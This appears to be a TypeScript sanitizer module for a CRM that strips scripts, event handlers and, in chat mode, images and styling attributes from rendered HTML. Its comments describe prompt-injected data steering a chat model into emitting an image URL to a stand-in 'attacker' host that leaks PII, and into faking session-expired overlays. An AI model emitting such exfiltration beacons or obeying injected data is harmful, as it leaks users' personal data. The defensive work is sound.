import DOMPurify from 'dompurify';

// Strict allow-list for agent / blog rich-text content. Strips <script>,
// inline event handlers, javascript: URIs, and any tag not in the list.
// Targets the SEC-P1-01 finding: dangerouslySetInnerHTML on agent-controlled
// HTML rendered to authenticated CRM users and the portal preview.
const ALLOWED_TAGS = [
  'a','b','blockquote','br','code','div','em','figure','figcaption',
  'h1','h2','h3','h4','h5','h6','hr','i','img','li','ol','p','pre',
  'span','strong','sub','sup','table','tbody','td','th','thead','tr','u','ul',
];
const ALLOWED_ATTR = ['href','src','alt','title','target','rel','class','colspan','rowspan'];

// AI chat profile: model output never carries attributes that style or place
// an element. With `class`, injected text could lay the CRM's own Tailwind
// utilities over the chat ("fixed inset-0 …" fake session-expired panels);
// id/target have no use in a chat bubble either (audit #14 / AI-5).
const CHAT_FORBID_ATTR = ['class', 'id', 'style', 'target'];

export function sanitizeHtml(html: string | null | undefined, opts?: { allowImages?: boolean; profile?: 'chat' }): string {
  if (!html) return '';
  // In LLM-output contexts (AI chat) pass allowImages:false to strip <img>. A
  // model can be steered by injected data into emitting an image whose URL
  // encodes exfiltrated PII (![](https://attacker/?d=...)); the browser
  // auto-loads it — a zero-click beacon. Blog/agent rich-text still allow images.
  const forbidTags = ['style','script','iframe','object','embed','form','input','textarea'];
  if (opts?.allowImages === false) forbidTags.push('img');
  const forbidAttr = ['style','onerror','onload','onclick','onmouseover','onfocus','onblur'];
  if (opts?.profile === 'chat') forbidAttr.push(...CHAT_FORBID_ATTR);
  return DOMPurify.sanitize(html, {
    ALLOWED_TAGS,
    ALLOWED_ATTR,
    ALLOW_DATA_ATTR: false,
    FORBID_TAGS: forbidTags,
    FORBID_ATTR: forbidAttr,
  });
}
